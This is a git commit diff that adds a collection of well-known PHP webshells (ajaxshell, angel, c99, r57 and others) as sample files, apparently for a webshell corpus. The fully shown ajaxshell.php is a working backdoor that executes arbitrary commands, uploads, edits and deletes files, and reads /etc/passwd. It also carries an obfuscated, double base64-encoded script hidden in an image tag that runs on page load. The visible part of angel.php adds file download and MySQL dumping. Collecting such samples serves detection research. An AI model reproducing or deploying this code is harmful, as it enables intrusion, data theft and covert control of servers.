summaryrefslogtreecommitdiff
path: root/data/samples/classic
diff options
context:
space:
mode:
Diffstat (limited to 'data/samples/classic')
-rw-r--r--data/samples/classic/ajaxshell.php652
-rw-r--r--data/samples/classic/angel.php2149
-rw-r--r--data/samples/classic/b374k.php10
-rw-r--r--data/samples/classic/c100.php3154
-rw-r--r--data/samples/classic/c99.php3157
-rw-r--r--data/samples/classic/cyb3rsh3ll.php7923
-rw-r--r--data/samples/classic/r57.php2302
-rw-r--r--data/samples/classic/simattacker.php756
-rw-r--r--data/samples/classic/sosyete.php225
9 files changed, 20328 insertions, 0 deletions
diff --git a/data/samples/classic/ajaxshell.php b/data/samples/classic/ajaxshell.php
new file mode 100644
index 0000000..0445858
--- /dev/null
+++ b/data/samples/classic/ajaxshell.php
@@ -0,0 +1,652 @@
1<?php
2session_start();
3
4error_reporting(0);
5
6$password = "password"; //Change this to your password ;)
7
8$version = "0.7B";
9
10$functions = array('Clear Screen' => 'ClearScreen()',
11'Clear History' => 'ClearHistory()',
12'Can I function?' => "runcommand('canirun','GET')",
13'Get server info' => "runcommand('showinfo','GET')",
14'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
15'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
16'Running processes' => "runcommand('ps -aux','GET')",
17'Readme' => "runcommand('shellhelp','GET')"
18
19);
20$thisfile = basename(__FILE__);
21
22$style = '<style type="text/css">
23.cmdthing {
24 border-top-width: 0px;
25 font-weight: bold;
26 border-left-width: 0px;
27 font-size: 10px;
28 border-left-color: #000000;
29 background: #000000;
30 border-bottom-width: 0px;
31 border-bottom-color: #FFFFFF;
32 color: #FFFFFF;
33 border-top-color: #008000;
34 font-family: verdana;
35 border-right-width: 0px;
36 border-right-color: #000000;
37}
38input,textarea {
39 border-top-width: 1px;
40 font-weight: bold;
41 border-left-width: 1px;
42 font-size: 10px;
43 border-left-color: #FFFFFF;
44 background: #000000;
45 border-bottom-width: 1px;
46 border-bottom-color: #FFFFFF;
47 color: #FFFFFF;
48 border-top-color: #FFFFFF;
49 font-family: verdana;
50 border-right-width: 1px;
51 border-right-color: #FFFFFF;
52}
53A:hover {
54text-decoration: none;
55}
56
57
58table,td,div {
59border-collapse: collapse;
60border: 1px solid #FFFFFF;
61}
62body {
63color: #FFFFFF;
64font-family: verdana;
65}
66</style>';
67$sess = __FILE__.$password;
68if(isset($_POST['p4ssw0rD']))
69{
70 if($_POST['p4ssw0rD'] == $password)
71 {
72 $_SESSION[$sess] = $_POST['p4ssw0rD'];
73 }
74 else
75 {
76 die("Wrong password");
77 }
78
79}
80if($_SESSION[$sess] == $password)
81{
82 if(isset($_SESSION['workdir']))
83 {
84 if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
85 {
86 chdir($_SESSION['workdir']);
87 }
88 }
89
90 if(isset($_FILES['uploadedfile']['name']))
91 {
92 $target_path = "./";
93 $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
94 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
95
96 }
97 }
98
99 if(isset($_GET['runcmd']))
100 {
101
102 $cmd = $_GET['runcmd'];
103
104 print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
105
106 if($cmd == "")
107 {
108 print "Empty Command..type \"shellhelp\" for some ehh...help";
109 }
110
111 elseif($cmd == "upload")
112 {
113 print '<br>Uploading to: '.realpath(".");
114 if(is_writable(realpath(".")))
115 {
116 print "<br><b>I can write to this directory</b>";
117 }
118 else
119 {
120 print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
121 }
122
123 }
124 elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
125 {
126 if(file_exists($file[1]) && is_dir($file[1]))
127 {
128 chdir($file[1]);
129 $_SESSION['workdir'] = $file[1];
130 print "Current directory changed to ".$file[1];
131 }
132 else
133 {
134 print "Directory not found";
135 }
136 }
137
138 elseif(strtolower($cmd) == "shellhelp")
139 {
140print '<b><font size=7>Ajax/PHP Command Shell</b></font>
141&copy; By Ironfist
142
143The shell can be used by anyone to command any server, the main purpose was
144to create a shell that feels as dynamic as possible, is expandable and easy
145to understand.
146
147If one of the command execution functions work, the shell will function fine.
148Try the "canirun" command to check this.
149
150Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re
151not used to these commands, google a little.
152
153<b>Custom Functions</b>
154If you want to add your own custom command in the Quick Commands list, check
155out the code. The $function array contains \'func name\' => \'javascript function\'.
156Take a look at the built-in functions for examples.
157
158I know this readme isn\'t providing too much information, but hell, does this shell
159even require one :P
160
161- Iron
162 ';
163
164 }
165 elseif(ereg("editfile (.*)",$cmd,$file))
166 {
167 if(file_exists($file[1]) && !is_dir($file[1]))
168 {
169 print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
170 $contents = file($file[1]);
171 foreach($contents as $line)
172 {
173 print htmlspecialchars($line);
174 }
175 print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
176 }
177 else
178 {
179 print "File not found.";
180 }
181 }
182 elseif(ereg("deletefile (.*)",$cmd,$file))
183 {
184 if(is_dir($file[1]))
185 {
186 if(rmdir($file[1]))
187 {
188 print "Directory succesfully deleted.";
189 }
190 else
191 {
192 print "Couldn't delete directory!";
193 }
194 }
195 else
196 {
197 if(unlink($file[1]))
198 {
199 print "File succesfully deleted.";
200 }
201 else
202 {
203 print "Couldn't delete file!";
204 }
205 }
206 }
207 elseif(strtolower($cmd) == "canirun")
208 {
209 print "If any of these functions is Enabled, the shell will function like it should.<br>";
210 if(function_exists(passthru))
211 {
212 print "Passthru: <b><font color=green>Enabled</b></font><br>";
213 }
214 else
215 {
216 print "Passthru: <b><font color=red>Disabled</b></font><br>";
217 }
218
219 if(function_exists(exec))
220 {
221 print "Exec: <b><font color=green>Enabled</b></font><br>";
222 }
223 else
224 {
225 print "Exec: <b><font color=red>Disabled</b></font><br>";
226 }
227
228 if(function_exists(system))
229 {
230 print "System: <b><font color=green>Enabled</b></font><br>";
231 }
232 else
233 {
234 print "System: <b><font color=red>Disabled</b></font><br>";
235 }
236 if(function_exists(shell_exec))
237 {
238 print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
239 }
240 else
241 {
242 print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
243 }
244 print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
245 if( ini_get('safe_mode') ){
246 print "Safe Mode: <b><font color=red>Enabled</b></font>";
247 }
248 else
249 {
250 print "Safe Mode: <b><font color=green>Disabled</b></font>";
251 }
252 print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
253 if( ini_get('open_basedir') ){
254 print "Open_basedir: <b><font color=red>Enabled</b></font>";
255 }
256 else
257 {
258 print "Open_basedir: <b><font color=green>Disabled</b></font>";
259 }
260 }
261 //About the shell
262 elseif(ereg("listdir (.*)",$cmd,$directory))
263 {
264
265 if(!file_exists($directory[1]))
266 {
267 die("Directory not found");
268 }
269 //Some variables
270 chdir($directory[1]);
271 $i = 0; $f = 0;
272 $dirs = "";
273 $filez = "";
274
275 if(!ereg("/$",$directory[1])) //Does it end with a slash?
276 {
277 $directory[1] .= "/"; //If not, add one
278 }
279 print "Listing directory: ".$directory[1]."<br>";
280 print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
281
282 if ($handle = opendir($directory[1])) {
283 while (false !== ($file = readdir($handle))) {
284 if(is_dir($file))
285 {
286 $dirs[$i] = $file;
287 $i++;
288 }
289 else
290 {
291 $filez[$f] = $file;
292 $f++;
293 }
294
295 }
296 print "<td>";
297
298 foreach($dirs as $directory)
299 {
300 print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
301 }
302
303 print "</td><td>";
304
305 foreach($filez as $file)
306 {
307 print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
308 }
309
310 print "</td></table>";
311 }
312 }
313 elseif(strtolower($cmd) == "about")
314 {
315 print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
316 }
317 //Show info
318 elseif(strtolower($cmd) == "showinfo")
319 {
320 if(function_exists(disk_free_space))
321 {
322 $free = disk_free_space("/") / 1000000;
323 }
324 else
325 {
326 $free = "N/A";
327 }
328 if(function_exists(disk_total_space))
329 {
330 $total = trim(disk_total_space("/") / 1000000);
331 }
332 else
333 {
334 $total = "N/A";
335 }
336 $path = realpath (".");
337
338 print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
339
340 if(function_exists(passthru))
341 {
342 passthru("uname -a");
343 }
344 else
345 {
346 print "Passthru is disabled :(";
347 }
348 }
349 //Read /etc/passwd
350 elseif(strtolower($cmd) == "etcpasswdfile")
351 {
352
353 $pw = file('/etc/passwd/');
354 foreach($pw as $line)
355 {
356 print $line;
357 }
358
359
360 }
361 //Execute any other command
362 else
363 {
364
365 if(function_exists(passthru))
366 {
367 passthru($cmd);
368 }
369 else
370 {
371 if(function_exists(exec))
372 {
373 exec("ls -la",$result);
374 foreach($result as $output)
375 {
376 print $output."<br>";
377 }
378 }
379 else
380 {
381 if(function_exists(system))
382 {
383 system($cmd);
384 }
385 else
386 {
387 if(function_exists(shell_exec))
388 {
389 print shell_exec($cmd);
390 }
391 else
392 {
393 print "Sorry, none of the command functions works.";
394 }
395 }
396 }
397 }
398 }
399 }
400
401 elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
402 {
403 $file = $_POST['filetosave'];
404 if(!is_writable($file))
405 {
406 if(!chmod($file, 0777))
407 {
408 die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
409 }
410 }
411
412 $fh = fopen($file, 'w');
413 $dt = $_POST['filecontent'];
414 fwrite($fh, $dt);
415 fclose($fh);
416 }
417 else
418 {
419?>
420<html>
421<head>
422<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
423<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
424<script type="text/javascript">
425if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
426setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(10);}, 500);
427</script>
428
429<?php print $style; ?>
430<SCRIPT TYPE="text/javascript">
431function sf(){document.cmdform.command.focus();}
432var outputcmd = "";
433var cmdhistory = "";
434function ClearScreen()
435{
436 outputcmd = "";
437 document.getElementById('output').innerHTML = outputcmd;
438}
439
440function ClearHistory()
441{
442 cmdhistory = "";
443 document.getElementById('history').innerHTML = cmdhistory;
444}
445
446function deletefile(file)
447{
448 deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
449 if(deleteit)
450 {
451 runcommand('deletefile ' + file,'GET');
452 }
453}
454
455var http_request = false;
456function makePOSTRequest(url, parameters) {
457 http_request = false;
458 if (window.XMLHttpRequest) {
459 http_request = new XMLHttpRequest();
460 if (http_request.overrideMimeType) {
461 http_request.overrideMimeType('text/html');
462 }
463 } else if (window.ActiveXObject) {
464 try {
465 http_request = new ActiveXObject("Msxml2.XMLHTTP");
466 } catch (e) {
467 try {
468 http_request = new ActiveXObject("Microsoft.XMLHTTP");
469 } catch (e) {}
470 }
471 }
472 if (!http_request) {
473 alert('Cannot create XMLHTTP instance');
474 return false;
475 }
476
477
478 http_request.open('POST', url, true);
479 http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
480 http_request.setRequestHeader("Content-length", parameters.length);
481 http_request.setRequestHeader("Connection", "close");
482 http_request.send(parameters);
483}
484
485
486function SaveFile()
487{
488var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
489 "&filecontent=" + encodeURI( document.getElementById("area1").value );
490makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
491document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
492}
493
494function runcommand(urltoopen,action,contenttosend){
495cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
496document.getElementById('history').innerHTML = cmdhistory;
497if(urltoopen == "clear")
498{
499ClearScreen();
500}
501 var ajaxRequest;
502 try{
503 ajaxRequest = new XMLHttpRequest();
504 } catch (e){
505 try{
506 ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
507 } catch (e) {
508 try{
509 ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
510 } catch (e){
511 alert("Wicked error, nothing we can do about it...");
512 return false;
513 }
514 }
515 }
516 ajaxRequest.onreadystatechange = function(){
517 if(ajaxRequest.readyState == 4){
518 outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
519 document.getElementById('output').innerHTML = outputcmd;
520 var objDiv = document.getElementById("output");
521 objDiv.scrollTop = objDiv.scrollHeight;
522 }
523 }
524 ajaxRequest.open(action, "?runcmd="+urltoopen , true);
525 if(action == "GET")
526 {
527 ajaxRequest.send(null);
528 }
529 document.cmdform.command.value='';
530 return false;
531}
532
533function set_tab_html(newhtml)
534{
535document.getElementById('commandtab').innerHTML = newhtml;
536}
537
538function set_tab(newtab)
539{
540 if(newtab == "cmd")
541 {
542 newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
543 }
544 else if(newtab == "upload")
545 {
546 runcommand('upload','GET');
547 newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
548 }
549 else if(newtab == "workingdir")
550 {
551 <?php
552 $folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
553 $pathparts = explode("/",realpath ("."));
554 foreach($pathparts as $folder)
555 {
556 $folders .= $folder."/";
557 }
558 $folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
559
560 ?>
561 newhtml = '<?php print $folders; ?>';
562 }
563 else if(newtab == "filebrowser")
564 {
565 newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
566 runcommand('listdir .','GET');
567 }
568 else if(newtab == "createfile")
569 {
570 newhtml = '<b>File Editor, under construction.</b>';
571 document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
572
573 }
574 document.getElementById('commandtab').innerHTML = newhtml;
575}
576</script>
577</head>
578<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
579<table border=1 width=100% height=100%>
580<td width=15% valign=top>
581
582<form name="extras"><br>
583<center><b>Quick Commands</b><br>
584
585<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
586<?php
587foreach($functions as $name => $execute)
588{
589print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
590}
591?>
592
593</center>
594
595</div>
596</form>
597<center><b>Command history</b><br></center>
598<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
599<br>
600<center><b>About</b><br></center>
601<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
602<br>
603<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
604<br>
605Version <?php print $version; ?>
606
607<br>
608<br>
609
610<br>Thanks to everyone @
611<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
612<br>
613<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
614<br>
615and special greetings to everyone in rootshell
616</div>
617
618</td>
619<td width=70%>
620<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
621<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b>
622<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b>
623<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b>
624<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b>
625<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b>
626
627</font></td>
628<tr>
629<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
630
631<tr>
632<td height=1% width=100% valign=top>
633<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
634&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
635<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
636</form>
637</div>
638</td>
639</table>
640</td>
641</table>
642</body>
643</html>
644<?php
645}
646} else {
647print "<center><table border=0 height=100%>
648<td valign=middle>
649<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
650</form>";
651}
652?> \ No newline at end of file
diff --git a/data/samples/classic/angel.php b/data/samples/classic/angel.php
new file mode 100644
index 0000000..fdec11e
--- /dev/null
+++ b/data/samples/classic/angel.php
@@ -0,0 +1,2149 @@
1<?php
2error_reporting(7);
3@set_magic_quotes_runtime(0);
4ob_start();
5$mtime = explode(' ', microtime());
6$starttime = $mtime[1] + $mtime[0];
7define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
8define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
9define('IS_COM', class_exists('COM') ? 1 : 0 );
10define('IS_GPC', get_magic_quotes_gpc());
11$dis_func = get_cfg_var('disable_functions');
12define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
13@set_time_limit(0);
14
15foreach($_POST as $key => $value) {
16 if (IS_GPC) {
17 $value = s_array($value);
18 }
19 $$key = $value;
20}
21/*===================== ³ÌÐòÅäÖà =====================*/
22
23//echo encode_pass('angel');exit;
24//angel = ec38fe2a8497e0a8d6d349b3533038cb
25// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë,Áô¿ÕΪ²»ÐèÒªÑéÖ¤
26$pass = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel
27
28//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
29// cookie ǰ׺
30$cookiepre = '';
31// cookie ×÷ÓÃÓò
32$cookiedomain = '';
33// cookie ×÷Ó÷¾¶
34$cookiepath = '/';
35// cookie ÓÐЧÆÚ
36$cookielife = 86400;
37
38//³ÌÐòËÑË÷¿ÉдÎļþµÄÀàÐÍ
39!$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';
40/*===================== ÅäÖýáÊø =====================*/
41
42$charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8');
43if ($charset == 'utf8') {
44 header("content-Type: text/html; charset=utf-8");
45} elseif ($charset == 'big5') {
46 header("content-Type: text/html; charset=big5");
47} elseif ($charset == 'gbk') {
48 header("content-Type: text/html; charset=gbk");
49} elseif ($charset == 'latin1') {
50 header("content-Type: text/html; charset=iso-8859-2");
51} elseif ($charset == 'euc-kr') {
52 header("content-Type: text/html; charset=euc-kr");
53} elseif ($charset == 'euc-jp') {
54 header("content-Type: text/html; charset=euc-jp");
55}
56
57$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
58$timestamp = time();
59
60/*===================== Éí·ÝÑéÖ¤ =====================*/
61if ($action == "logout") {
62 scookie('loginpass', '', -86400 * 365);
63 @header('Location: '.$self);
64 exit;
65}
66if($pass) {
67 if ($action == 'login') {
68 if ($pass == encode_pass($password)) {
69 scookie('loginpass',encode_pass($password));
70 @header('Location: '.$self);
71 exit;
72 }
73 }
74 if ($_COOKIE['loginpass']) {
75 if ($_COOKIE['loginpass'] != $pass) {
76 loginpage();
77 }
78 } else {
79 loginpage();
80 }
81}
82/*===================== ÑéÖ¤½áÊø =====================*/
83
84$errmsg = '';
85!$action && $action = 'file';
86
87// ²é¿´PHPINFO
88if ($action == 'phpinfo') {
89 if (IS_PHPINFO) {
90 phpinfo();
91 exit;
92 } else {
93 $errmsg = 'phpinfo() function has non-permissible';
94 }
95}
96
97// ÏÂÔØÎļþ
98if ($doing == 'downfile' && $thefile) {
99 if (!@file_exists($thefile)) {
100 $errmsg = 'The file you want Downloadable was nonexistent';
101 } else {
102 $fileinfo = pathinfo($thefile);
103 header('Content-type: application/x-'.$fileinfo['extension']);
104 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
105 header('Content-Length: '.filesize($thefile));
106 @readfile($thefile);
107 exit;
108 }
109}
110
111// Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â
112if ($doing == 'backupmysql' && !$saveasfile) {
113 if (!$table) {
114 $errmsg ='Please choose the table';
115 } else {
116 $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
117 $filename = basename($dbname.'.sql');
118 header('Content-type: application/unknown');
119 header('Content-Disposition: attachment; filename='.$filename);
120 foreach($table as $k => $v) {
121 if ($v) {
122 sqldumptable($v);
123 }
124 }
125 mysql_close();
126 exit;
127 }
128}
129
